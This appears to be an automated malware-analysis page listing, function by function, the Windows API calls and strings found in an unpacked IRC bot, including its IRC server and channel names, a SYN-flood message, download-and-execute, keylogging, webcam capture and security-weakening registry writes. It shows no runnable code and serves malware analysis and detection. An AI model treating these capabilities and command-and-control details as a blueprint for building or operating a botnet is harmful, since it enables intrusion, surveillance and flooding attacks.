WS2_32.htons
WS2_32.ioctlsocket
WS2_32.connect
WS2_32.select
WS2_32.closesocket
|
sub_40B822(a7c4):
KERNEL32.Sleep
|
sub_41E92D(a8e4):
KERNEL32.GetOEMCP
KERNEL32.GetCPInfo
|
sub_40E337(a909):
"Username accounts for local system:"
" %S"
"Total users found: %d."
|
sub_40D793(a9bc):
ADVAPI32.OpenSCManagerA
NTDLL.RtlGetLastWin32Error
ADVAPI32.OpenServiceA
ADVAPI32.ControlService
ADVAPI32.StartServiceA
ADVAPI32.DeleteService
ADVAPI32.CloseServiceHandle
|
sub_40E6A9(aa9b):
KERNEL32.GetTickCount
KERNEL32.SetErrorMode
KERNEL32.CreateMutexA
KERNEL32.WaitForSingleObject
WS2_32.WSAStartup
KERNEL32.GetSystemDirectoryA
KERNEL32.SetFileAttributesA
KERNEL32.CopyFileA
NTDLL.RtlGetLastWin32Error
KERNEL32.Sleep
KERNEL32.GetCurrentProcessId
KERNEL32.OpenProcess
KERNEL32.CreateProcessA
WS2_32.WSACleanup
KERNEL32.DeleteFileA
WININET.InternetGetConnectedState
"botid"
"%s%s"
"%s\\%s"
"saber.ircqforum.com"
"#faak#"
"saad."
"saber.ircqforum.com"
"#faak#"
"saad."
"#faak#"
"saad."
|
sub_415996(ac14):
KERNEL32.GetTickCount
"[bot]-"
"%s"
|
sub_40A4AC(ac3c):
"Kernel32.dll failed. <%d>"
"User32.dll failed. <%d>"
"Advapi32.dll failed. <%d>"
"Gdi32.dll failed. <%d>"
"Ws2_32.dll failed. <%d>"
"Wininet.dll failed. <%d>"
"Icmp.dll failed. <%d>"
"Netapi32.dll failed. <%d>"
"Dnsapi.dll failed. <%d>"
"Iphlpapi.dll failed. <%d>"
"Mpr32.dll failed. <%d>"
"Shell32.dll failed. <%d>"
"Odbc32.dll failed. <%d>"
"Avicap32.dll failed. <%d>"
|
sub_422BC9(aeff):
KERNEL32.RaiseException
|
sub_40DC82(afa1):
KERNEL32.MultiByteToWideChar
|
sub_401A76(b2d9):
WS2_32.WSAStartup
WS2_32.WSASocketA
WS2_32.setsockopt
WS2_32.htons
KERNEL32.QueryPerformanceFrequency
KERNEL32.QueryPerformanceCounter
WS2_32.htonl
WS2_32.sendto
WS2_32.WSAGetLastError
WS2_32.closesocket
WS2_32.WSACleanup
|
sub_40D099(b2db):
KERNEL32.GetDriveTypeA
"Cdrom"
"Network"
"Disk"
"Invalid"
"Unknown"
|
sub_419BBA(b873):
KERNEL32.DeleteFileA
NTDLL.RtlGetLastWin32Error
|
sub_40C07F(ba2e):
KERNEL32.ExitThread
|
sub_407110(bb8e):
" %s: %d,"
" Total: %d in %s."
|
sub_41511F(bbe1):
KERNEL32.GetCurrentProcess
ADVAPI32.OpenProcessToken
ADVAPI32.LookupPrivilegeValueA
ADVAPI32.AdjustTokenPrivileges
|
sub_4D7DD0(bc12):
"GetLongPathNameA"
"kernel32"
|
sub_40EB92(bc9b):
WS2_32.htons
WS2_32.socket
WS2_32.connect
WS2_32.closesocket
KERNEL32.Sleep
|
sub_408DCA(be59):
KERNEL32.ExitThread
|
sub_40ECFA(c24e):
WS2_32.send
WS2_32.closesocket
KERNEL32.Sleep
WS2_32.recv
"PASS %s\r\n"
|
sub_406A0D(c265):
WS2_32.send
WS2_32.WSAGetLastError
|
sub_406387(c682):
WS2_32.send
KERNEL32.FileTimeToLocalFileTime
KERNEL32.FileTimeToSystemTime
KERNEL32.Sleep
"\n"
"PRIVMSG %s :Searching for: %s\r\n"
"\r\n\r\nIndex of %s</TIT"...
"<H1>Index of %s</H1>\r\n<TABLE BORDER=\"0\""...
"<TR>\r\n<TD WIDTH=\"%d\"><CODE>Name</CODE><"...
"<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
"<TR>\r\n<TD COLSPAN=\"3\"><A HREF=\"%s\"><COD"...
".."
"."
"PM"
"AM"
"%2.2d/%2.2d/%4d %2.2d:%2.2d %s"
"<%s>"
"PRIVMSG %s :%-31s %-21s\n"
"<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
"%s%s/"
"\"><CODE>%.29s>/</CODE></A>"
"\"><CODE>%s/</CODE></A>"
"</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
"<%s>"
"%-31s %-21s\r\n"
"PRIVMSG %s :%-31s %-21s (%s bytes)\n"
"<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
"%s%s"
"\"><CODE>%.30s></CODE></A>"
"\"><CODE>%s</CODE></A>"
"</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
"%-31s %-21s (%i bytes)\r\n"
"PRIVMSG %s :Found %s Files and %s Direc"...
"<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
"Found: %i Files and %i Directories\r\n"
</font></pre></td></tr><tr id="sub_41E321"><td><pre><a name="sub_41E321"></a><a href="00ed1a5b05665cea62a301ad00387180_unpacked.asm.html#sub_41E321"><font size=+2>sub_41E321</a>(c6bf)</font>:<font color=darkgreen>
NTDLL.RtlGetLastWin32Error</font>
<font color=brown></font></pre></td></tr><tr id="sub_40D633"><td><pre><a name="sub_40D633"></a><a href="00ed1a5b05665cea62a301ad00387180_unpacked.asm.html#sub_40D633"><font size=+2>sub_40D633</a>(c85a)</font>:<font color=darkgreen>
WS2_32.send</font>
<font color=brown></font></pre></td></tr><tr id="sub_41F5BF"><td><pre><a name="sub_41F5BF"></a><a href="00ed1a5b05665cea62a301ad00387180_unpacked.asm.html#sub_41F5BF"><font size=+2>sub_41F5BF</a>(c890)</font>:<font color=darkgreen>
KERNEL32.GetStartupInfoA
KERNEL32.GetFileType
KERNEL32.GetStdHandle
KERNEL32.LockResource</font>
<font color=brown></font></pre></td></tr><tr id="sub_417EFC"><td><pre><a name="sub_417EFC"></a><a href="00ed1a5b05665cea62a301ad00387180_unpacked.asm.html#sub_417EFC"><font size=+2>sub_417EFC</a>(cba9)</font>:<font color=darkgreen>
NTDLL.RtlUnwind</font>
<font color=brown></font></pre></td></tr><tr id="sub_41B3E6"><td><pre><a name="sub_41B3E6"></a><a href="00ed1a5b05665cea62a301ad00387180_unpacked.asm.html#sub_41B3E6"><font size=+2>sub_41B3E6</a>(cbe8)</font>:<font color=darkgreen>
NTDLL.RtlReAllocateHeap
NTDLL.RtlAllocateHeap
KERNEL32.VirtualAlloc
NTDLL.RtlFreeHeap</font>
<font color=brown></font></pre></td></tr><tr id="sub_40BB8C"><td><pre><a name="sub_40BB8C"></a><a href="00ed1a5b05665cea62a301ad00387180_unpacked.asm.html#sub_40BB8C"><font size=+2>sub_40BB8C</a>(cf39)</font>:<font color=darkgreen>
WININET.InternetGetConnectedStateEx</font>
<font color=brown>
"[NETINFO]: [Type]: %s (%s). [IP Address"...
</font></pre></td></tr><tr id="sub_422C78"><td><pre><a name="sub_422C78"></a><a href="00ed1a5b05665cea62a301ad00387180_unpacked.asm.html#sub_422C78"><font size=+2>sub_422C78</a>(cf54)</font>:<font color=darkgreen>
KERNEL32.LCMapStringW
KERNEL32.LCMapStringA
KERNEL32.WideCharToMultiByte
KERNEL32.MultiByteToWideChar</font>
<font color=brown></font></pre></td></tr><tr id="sub_4DA8A0"><td><pre><a name="sub_4DA8A0"></a><a href="00ed1a5b05665cea62a301ad00387180_unpacked.asm.html#sub_4DA8A0"><font size=+2>sub_4DA8A0</a>(d153)</font>:<font color=brown>
"kernel32.dll"
"GetCurrentProcessId"
</font></pre></td></tr><tr id="sub_41C040"><td><pre><a name="sub_41C040"></a><a href="00ed1a5b05665cea62a301ad00387180_unpacked.asm.html#sub_41C040"><font size=+2>sub_41C040</a>(d2f6)</font>:<font color=darkgreen>
KERNEL32.RaiseException</font>
<font color=brown></font></pre></td></tr><tr id="sub_40C351"><td><pre><a name="sub_40C351"></a><a href="00ed1a5b05665cea62a301ad00387180_unpacked.asm.html#sub_40C351"><font size=+2>sub_40C351</a>(d3f9)</font>:<font color=darkgreen>
KERNEL32.ExitThread
WS2_32.closesocket
KERNEL32.Sleep
WS2_32.recv</font>
<font color=brown>
"\n"
</font></pre></td></tr><tr id="sub_415F88"><td><pre><a name="sub_415F88"></a><a href="00ed1a5b05665cea62a301ad00387180_unpacked.asm.html#sub_415F88"><font size=+2>sub_415F88</a>(d7b4)</font>:<font color=darkgreen>
ADVAPI32.RegOpenKeyExA
ADVAPI32.RegSetValueExA
ADVAPI32.RegCloseKey</font>
<font color=brown>
"Software\\Microsoft\\OLE"
"EnableDCOM"
"SYSTEM\\CurrentControlSet\\Control\\Lsa"
"restrictanonymous"
</font></pre></td></tr><tr id="sub_4018D0"><td><pre><a name="sub_4018D0"></a><a href="00ed1a5b05665cea62a301ad00387180_unpacked.asm.html#sub_4018D0"><font size=+2>sub_4018D0</a>(d826)</font>:<font color=darkgreen>
WS2_32.htons
WS2_32.socket
WS2_32.ioctlsocket
WS2_32.connect
KERNEL32.Sleep
WS2_32.closesocket</font>
<font color=brown></font></pre></td></tr><tr id="sub_408EE5"><td><pre><a name="sub_408EE5"></a><a href="00ed1a5b05665cea62a301ad00387180_unpacked.asm.html#sub_408EE5"><font size=+2>sub_408EE5</a>(d890)</font>:<font color=darkgreen>
KERNEL32.GetTickCount</font>
<font color=brown>
"%s\\*"
"%s\\%s"
" Found: %s\\%s"
</font></pre></td></tr><tr id="sub_41518A"><td><pre><a name="sub_41518A"></a><a href="00ed1a5b05665cea62a301ad00387180_unpacked.asm.html#sub_41518A"><font size=+2>sub_41518A</a>(d8e6)</font>:<font color=darkgreen>
KERNEL32.CreateToolhelp32Snapshot
KERNEL32.Process32First
KERNEL32.Process32Next
KERNEL32.Module32First
KERNEL32.CopyFileA
KERNEL32.OpenProcess
KERNEL32.TerminateProcess</font>
<font color=brown>
"SeDebugPrivilege"
" %s (%d)"
"SeDebugPrivilege"
</font></pre></td></tr><tr id="sub_40AF86"><td><pre><a name="sub_40AF86"></a><a href="00ed1a5b05665cea62a301ad00387180_unpacked.asm.html#sub_40AF86"><font size=+2>sub_40AF86</a>(da39)</font>:<font color=darkgreen>
IPHLPAPI.IcmpCreateFile
WS2_32.inet_addr
WS2_32.gethostbyname
KERNEL32.ExitThread
IPHLPAPI.IcmpSendEcho
IPHLPAPI.IcmpCloseHandle</font>
<font color=brown></font></pre></td></tr><tr id="sub_405F4D"><td><pre><a name="sub_405F4D"></a><a href="00ed1a5b05665cea62a301ad00387180_unpacked.asm.html#sub_405F4D"><font size=+2>sub_405F4D</a>(dac6)</font>:<font color=darkgreen>
KERNEL32.GetDateFormatA
KERNEL32.GetTimeFormatA
WS2_32.send
WS2_32.closesocket
KERNEL32.ExitThread</font>
<font color=brown>
"text/html"
"application/octet-stream"
"ddd, dd MMM yyyy"
"HH:mm:ss"
"HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
"HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
</font></pre></td></tr><tr id="sub_4211F1"><td><pre><a name="sub_4211F1"></a><a href="00ed1a5b05665cea62a301ad00387180_unpacked.asm.html#sub_4211F1"><font size=+2>sub_4211F1</a>(db0a)</font>:<font color=darkgreen>
KERNEL32.SetEndOfFile
NTDLL.RtlGetLastWin32Error</font>
<font color=brown></font></pre></td></tr><tr id="sub_40CAF1"><td><pre><a name="sub_40CAF1"></a><a href="00ed1a5b05665cea62a301ad00387180_unpacked.asm.html#sub_40CAF1"><font size=+2>sub_40CAF1</a>(db85)</font>:<font color=darkgreen>
WININET.InternetOpenUrlA
KERNEL32.ExitThread
KERNEL32.GetTickCount
WININET.InternetReadFile
KERNEL32.WriteFile
KERNEL32.CreateProcessA
WS2_32.WSACleanup
WININET.InternetCloseHandle</font>
<font color=brown>
"open"
</font></pre></td></tr><tr id="sub_40D320"><td><pre><a name="sub_40D320"></a><a href="00ed1a5b05665cea62a301ad00387180_unpacked.asm.html#sub_40D320"><font size=+2>sub_40D320</a>(dc5b)</font>:<font color=darkgreen>
KERNEL32.GetLogicalDriveStringsA</font>
<font color=brown>
"A:\\"
</font></pre></td></tr><tr id="sub_41F48D"><td><pre><a name="sub_41F48D"></a><a href="00ed1a5b05665cea62a301ad00387180_unpacked.asm.html#sub_41F48D"><font size=+2>sub_41F48D</a>(dcdc)</font>:<font color=darkgreen>
KERNEL32.GetEnvironmentStringsW
KERNEL32.GetEnvironmentStrings
KERNEL32.WideCharToMultiByte
KERNEL32.FreeEnvironmentStringsW
KERNEL32.FreeEnvironmentStringsA</font>
<font color=brown></font></pre></td></tr><tr id="sub_41B888"><td><pre><a name="sub_41B888"></a><a href="00ed1a5b05665cea62a301ad00387180_unpacked.asm.html#sub_41B888"><font size=+2>sub_41B888</a>(df93)</font>:<font color=darkgreen>
NTDLL.RtlAllocateHeap
KERNEL32.VirtualAlloc
KERNEL32.VirtualFree
NTDLL.RtlFreeHeap</font>
<font color=brown></font></pre></td></tr><tr id="sub_40AEE0"><td><pre><a name="sub_40AEE0"></a><a href="00ed1a5b05665cea62a301ad00387180_unpacked.asm.html#sub_40AEE0"><font size=+2>sub_40AEE0</a>(e076)</font>:<font color=darkgreen>
WS2_32.getsockname</font>
<font color=brown>
"%d.%d.%d.%d"
</font></pre></td></tr><tr id="sub_40ADCA"><td><pre><a name="sub_40ADCA"></a><a href="00ed1a5b05665cea62a301ad00387180_unpacked.asm.html#sub_40ADCA"><font size=+2>sub_40ADCA</a>(e080)</font>:<font color=darkgreen>
WS2_32.inet_addr
WS2_32.gethostbyname</font>
<font color=brown></font></pre></td></tr><tr id="sub_401831"><td><pre><a name="sub_401831"></a><a href="00ed1a5b05665cea62a301ad00387180_unpacked.asm.html#sub_401831"><font size=+2>sub_401831</a>(e101)</font>:<font color=darkgreen>
KERNEL32.ExitThread</font>
<font color=brown>
"[SUPERSYN]: Done with flood (%iKB/sec)"
</font></pre></td></tr><tr id="sub_4019D7"><td><pre><a name="sub_4019D7"></a><a href="00ed1a5b05665cea62a301ad00387180_unpacked.asm.html#sub_4019D7"><font size=+2>sub_4019D7</a>(e101)</font>:<font color=darkgreen>
KERNEL32.ExitThread</font>
<font color=brown></font></pre></td></tr><tr id="sub_406AF8"><td><pre><a name="sub_406AF8"></a><a href="00ed1a5b05665cea62a301ad00387180_unpacked.asm.html#sub_406AF8"><font size=+2>sub_406AF8</a>(e1a1)</font>:<font color=darkgreen>
WS2_32.WSAStartup
WS2_32.socket
WS2_32.htons
WS2_32.connect
WS2_32.send
WS2_32.recv
WS2_32.closesocket
WS2_32.WSACleanup</font>
<font color=brown>
"%s %s HTTP/1.1\nReferer: %s\nHost: %s\nCon"...
</font></pre></td></tr><tr id="sub_415480"><td><pre><a name="sub_415480"></a><a href="00ed1a5b05665cea62a301ad00387180_unpacked.asm.html#sub_415480"><font size=+2>sub_415480</a>(e3c8)</font>:<font color=darkgreen>
WS2_32.select
WS2_32.closesocket
KERNEL32.ExitThread
WS2_32.recv
WS2_32.getpeername
WS2_32.WSAGetLastError
WS2_32.gethostbyaddr
WS2_32.inet_ntoa
WS2_32.send
NTDLL.RtlGetLastWin32Error</font>
<font color=brown>
"Permission denied\n"
</font></pre></td></tr><tr id="sub_415685"><td><pre><a name="sub_415685"></a><a href="00ed1a5b05665cea62a301ad00387180_unpacked.asm.html#sub_415685"><font size=+2>sub_415685</a>(e4e3)</font>:<font color=darkgreen>
WS2_32.recv</font>
<font color=brown></font></pre></td></tr><tr id="sub_422492"><td><pre><a name="sub_422492"></a><a href="00ed1a5b05665cea62a301ad00387180_unpacked.asm.html#sub_422492"><font size=+2>sub_422492</a>(e51d)</font>:<font color=darkgreen>
KERNEL32.SetEnvironmentVariableA</font>
<font color=brown></font></pre></td></tr><tr id="sub_419B07"><td><pre><a name="sub_419B07"></a><a href="00ed1a5b05665cea62a301ad00387180_unpacked.asm.html#sub_419B07"><font size=+2>sub_419B07</a>(e781)</font>:<font color=darkgreen>
KERNEL32.GetCurrentProcess
KERNEL32.TerminateProcess</font>
<font color=brown></font></pre></td></tr><tr id="sub_4022C6"><td><pre><a name="sub_4022C6"></a><a href="00ed1a5b05665cea62a301ad00387180_unpacked.asm.html#sub_4022C6"><font size=+2>sub_4022C6</a>(e8aa)</font>:<font color=darkgreen>
KERNEL32.GetLocalTime
KERNEL32.GetSystemDirectoryA</font>
<font color=brown>
"\\"
"ab"
"[%d-%d-%d %d:%d:%d] %s\r\n"
</font></pre></td></tr><tr id="sub_41B9CC"><td><pre><a name="sub_41B9CC"></a><a href="00ed1a5b05665cea62a301ad00387180_unpacked.asm.html#sub_41B9CC"><font size=+2>sub_41B9CC</a>(ea79)</font>:<font color=darkgreen>
KERNEL32.VirtualFree
NTDLL.RtlFreeHeap</font>
<font color=brown></font></pre></td></tr><tr id="sub_405A58"><td><pre><a name="sub_405A58"></a><a href="00ed1a5b05665cea62a301ad00387180_unpacked.asm.html#sub_405A58"><font size=+2>sub_405A58</a>(eaa6)</font>:<font color=darkgreen>
WS2_32.send
KERNEL32.Sleep
WS2_32.closesocket
WS2_32.WSACleanup</font>
<font color=brown>
"rb"
</font></pre></td></tr><tr id="sub_40981F"><td><pre><a name="sub_40981F"></a><a href="00ed1a5b05665cea62a301ad00387180_unpacked.asm.html#sub_40981F"><font size=+2>sub_40981F</a>(eb03)</font>:<font color=darkgreen>
KERNEL32.GetProcessHeap
NTDLL.RtlGetLastWin32Error
WININET.InternetOpenA</font>
<font color=brown>
"kernel32.dll"
"SetErrorMode"
"CreateToolhelp32Snapshot"
"Process32First"
"GetDiskFreeSpaceExA"
"GetLogicalDriveStringsA"
"SearchPathA"
"QueryPerformanceCounter"
"QueryPerformanceFrequency"
"RegisterServiceProcess"
"user32.dll"
"SendMessageA"
"FindWindowA"
"IsWindow"
"GetClipboardData"
"CloseClipboard"
"GetAsyncKeyState"
"GetKeyState"
"GetWindowTextA"
"GetForegroundWindow"
"advapi32.dll"
"RegCreateKeyExA"
"RegSetValueExA"
"RegQueryValueExA"
"RegDeleteValueA"
"RegCloseKey"
"OpenProcessToken"
"LookupPrivilegeValueA"
"AdjustTokenPrivileges"
"OpenSCManagerA"
"OpenServiceA"
"ControlService"
"CloseServiceHandle"
"EnumServicesStatusA"
"IsValidSecurityDescriptor"
"GetUserNameA"
"gdi32.dll"
"CreateDCA"
"CreateDIBSection"
"CreateCompatibleDC"
"GetDIBColorTable"
"SelectObject"
"BitBlt"
"DeleteDC"
"DeleteObject"
"ws2_32.dll"
"WSAStartup"
"WSASocketA"
"WSAAsyncSelect"
"__WSAFDIsSet"
"WSAIoctl"
"WSAGetLastError"
"WSACleanup"
"socket"
"ioctlsocket"
"connect"
"inet_ntoa"
"inet_addr"
"htons"
"htonl"
"ntohs"
"ntohl"
"send"
"sendto"
"recv"
"recvfrom"
"bind"
"select"
"listen"
"accept"
"setsockopt"
"getsockname"
"gethostname"
"getpeername"
"closesocket"
"wininet.dll"
"InternetGetConnectedState"
"InternetGetConnectedStateEx"
"HttpOpenRequestA"
"HttpSendRequestA"
"InternetConnectA"
"InternetOpenUrlA"
"InternetCrackUrlA"
"InternetReadFile"
"InternetCloseHandle"
"Mozilla/4.0 (compatible)"
"icmp.dll"
"IcmpCreateFile"
"IcmpCloseHandle"
"IcmpSendEcho"
"netapi32.dll"
"NetShareAdd"
"NetShareDel"
"NetShareEnum"
"NetScheduleJobAdd"
"NetApiBufferFree"
"NetRemoteTOD"
"NetUserAdd"
"NetUserDel"
"NetUserEnum"
"NetUserGetInfo"
"NetMessageBufferSend"
"dnsapi.dll"
"DnsFlushResolverCache"
"DnsFlushResolverCacheEntry_A"
"iphlpapi.dll"
"DeleteIpNetEntry"
"mpr.dll"
"WNetAddConnection2A"
"WNetAddConnection2W"
"WNetCancelConnection2A"
"WNetCancelConnection2W"
"shell32.dll"
"SHChangeNotify"
"odbc32.dll"
"SQLDriverConnect"
"SQLAllocHandle"
"avicap32.dll"
"capCreateCaptureWindowA"
"capGetDriverDescriptionA"
</font></pre></td></tr><tr id="sub_40C8B4"><td><pre><a name="sub_40C8B4"></a><a href="00ed1a5b05665cea62a301ad00387180_unpacked.asm.html#sub_40C8B4"><font size=+2>sub_40C8B4</a>(ebb9)</font>:<font color=darkgreen>
KERNEL32.GetSystemDirectoryA
WS2_32.recv
WS2_32.htonl
WS2_32.send
WS2_32.closesocket
KERNEL32.ExitThread</font>
<font color=brown>
"%s%s"
"a+b"
</font></pre></td></tr><tr id="sub_403249"><td><pre><a name="sub_403249"></a><a href="00ed1a5b05665cea62a301ad00387180_unpacked.asm.html#sub_403249"><font size=+2>sub_403249</a>(ec29)</font>:<font color=darkgreen>
WS2_32.htons
WS2_32.send
WS2_32.recv
KERNEL32.Sleep</font>
<font color=brown></font></pre></td></tr><tr id="sub_40BF6D"><td><pre><a name="sub_40BF6D"></a><a href="00ed1a5b05665cea62a301ad00387180_unpacked.asm.html#sub_40BF6D"><font size=+2>sub_40BF6D</a>(edda)</font>:<font color=darkgreen>
KERNEL32.GetLocalTime</font>
<font color=brown>
"[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s"
</font></pre></td></tr><tr id="sub_4210E8"><td><pre><a name="sub_4210E8"></a><a href="00ed1a5b05665cea62a301ad00387180_unpacked.asm.html#sub_4210E8"><font size=+2>sub_4210E8</a>(ef2b)</font>:<font color=darkgreen>
NTDLL.RtlAllocateHeap</font>
<font color=brown></font></pre></td></tr><tr id="sub_403A90"><td><pre><a name="sub_403A90"></a><a href="00ed1a5b05665cea62a301ad00387180_unpacked.asm.html#sub_403A90"><font size=+2>sub_403A90</a>(f1cc)</font>:<font color=brown>
"CCCC"
</font></pre></td></tr><tr id="sub_416DC7"><td><pre><a name="sub_416DC7"></a><a href="00ed1a5b05665cea62a301ad00387180_unpacked.asm.html#sub_416DC7"><font size=+2>sub_416DC7</a>(f21d)</font>:<font color=darkgreen>
KERNEL32.ExitThread</font>
<font color=brown></font></pre></td></tr><tr id="sub_4081EF"><td><pre><a name="sub_4081EF"></a><a href="00ed1a5b05665cea62a301ad00387180_unpacked.asm.html#sub_4081EF"><font size=+2>sub_4081EF</a>(f519)</font>:<font color=darkgreen>
WS2_32.select
WS2_32.closesocket
KERNEL32.ExitThread
WS2_32.recv
WS2_32.send
WS2_32.socket
WS2_32.WSAGetLastError
WS2_32.connect</font>
<font color=brown></font></pre></td></tr><tr id="sub_40D24E"><td><pre><a name="sub_40D24E"></a><a href="00ed1a5b05665cea62a301ad00387180_unpacked.asm.html#sub_40D24E"><font size=+2>sub_40D24E</a>(f5ac)</font>:<font color=brown>
"failed"
</font></pre></td></tr><tr id="sub_40B390"><td><pre><a name="sub_40B390"></a><a href="00ed1a5b05665cea62a301ad00387180_unpacked.asm.html#sub_40B390"><font size=+2>sub_40B390</a>(f806)</font>:<font color=darkgreen>
KERNEL32.Sleep
WS2_32.send</font>
<font color=brown>
"PRIVMSG %s :%s\r"
"%s"
</font></pre></td></tr><tr id="sub_409706"><td><pre><a name="sub_409706"></a><a href="00ed1a5b05665cea62a301ad00387180_unpacked.asm.html#sub_409706"><font size=+2>sub_409706</a>(f82b)</font>:<font color=darkgreen>
KERNEL32.GetProcessHeap
NTDLL.RtlAllocateHeap
NTDLL.RtlFreeHeap</font>
<font color=brown></font></pre></td></tr><tr id="sub_409209"><td><pre><a name="sub_409209"></a><a href="00ed1a5b05665cea62a301ad00387180_unpacked.asm.html#sub_409209"><font size=+2>sub_409209</a>(fc23)</font>:<font color=darkgreen>
KERNEL32.GetProcessHeap
NTDLL.RtlAllocateHeap
NTDLL.RtlFreeHeap</font>
<font color=brown>
"WINLOGON"
"NWGINA"
"MSGINA"
</font></pre></td></tr><tr id="sub_41F885"><td><pre><a name="sub_41F885"></a><a href="00ed1a5b05665cea62a301ad00387180_unpacked.asm.html#sub_41F885"><font size=+2>sub_41F885</a>(fc50)</font>:<font color=darkgreen>
KERNEL32.GetStdHandle
KERNEL32.WriteFile</font>
<font color=brown>
"<program name unknown>"
"..."
"Runtime Error!\n\nProgram: "
"\n\n"
"Microsoft Visual C++ Runtime Library"
</font></pre></td></tr><tr id="sub_4D22E0"><td><pre><a name="sub_4D22E0"></a><a href="00ed1a5b05665cea62a301ad00387180_unpacked.asm.html#sub_4D22E0"><font size=+2>sub_4D22E0</a>(fcb5)</font>:<font color=brown>
"BARIER"
"kernel32.dll"
"FlushInstructionCache"
"GetCurrentProcess"
</font></pre></td></tr><tr id="sub_42217C"><td><pre><a name="sub_42217C"></a><a href="00ed1a5b05665cea62a301ad00387180_unpacked.asm.html#sub_42217C"><font size=+2>sub_42217C</a>(fe6c)</font>:<font color=darkgreen>
KERNEL32.WideCharToMultiByte</font>
<font color=brown></font></pre></td></tr><tr id="sub_41BA22"><td><pre><a name="sub_41BA22"></a><a href="00ed1a5b05665cea62a301ad00387180_unpacked.asm.html#sub_41BA22"><font size=+2>sub_41BA22</a>(ffe7)</font>:<font color=darkgreen>
KERNEL32.VirtualFree</font>
<font color=brown></font></pre></td></tr></table><script>
document.getElementById(window.location.href.split('#')[1]).setAttribute("style", "background-color:#ddddff");
</script>
</html> |